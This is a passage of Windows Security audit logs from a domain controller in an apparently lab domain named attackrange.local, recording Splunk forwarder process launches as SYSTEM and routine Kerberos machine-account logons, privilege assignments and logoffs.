Logon ID: 0x0
Process Information:
New Process ID: 0x79c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264427
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a34
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264428
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264430
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xca8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264429
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf44
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:11:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264432
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x80C997
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62631
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:11:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264431
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80C997
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:11:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264433
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80C997
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264436
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80D7B7
Logon Type: 3
04/19/2021 03:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264435
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x80D7B7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62639
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:11:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264434
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80D7B7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:12:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264438
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 03:12:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264437
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1690
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 03:12:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264439
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1834
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 03:12:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264440
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xde0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:12:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264441
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:12:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264443
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1670
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:12:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264442
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1648
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264449
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8106EF
Logon Type: 3
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264448
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8106EF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62647
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264447
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8106EF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264446
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x810683
Logon Type: 3
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264445
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x810683
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62646
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:12:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264444
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x810683
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:12:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264452
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81138D
Logon Type: 3
04/19/2021 03:12:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264451
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81138D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62656
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:12:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264450
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81138D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:13:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264454
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264453
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a38
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264455
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x3bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:13:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264456
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19b0
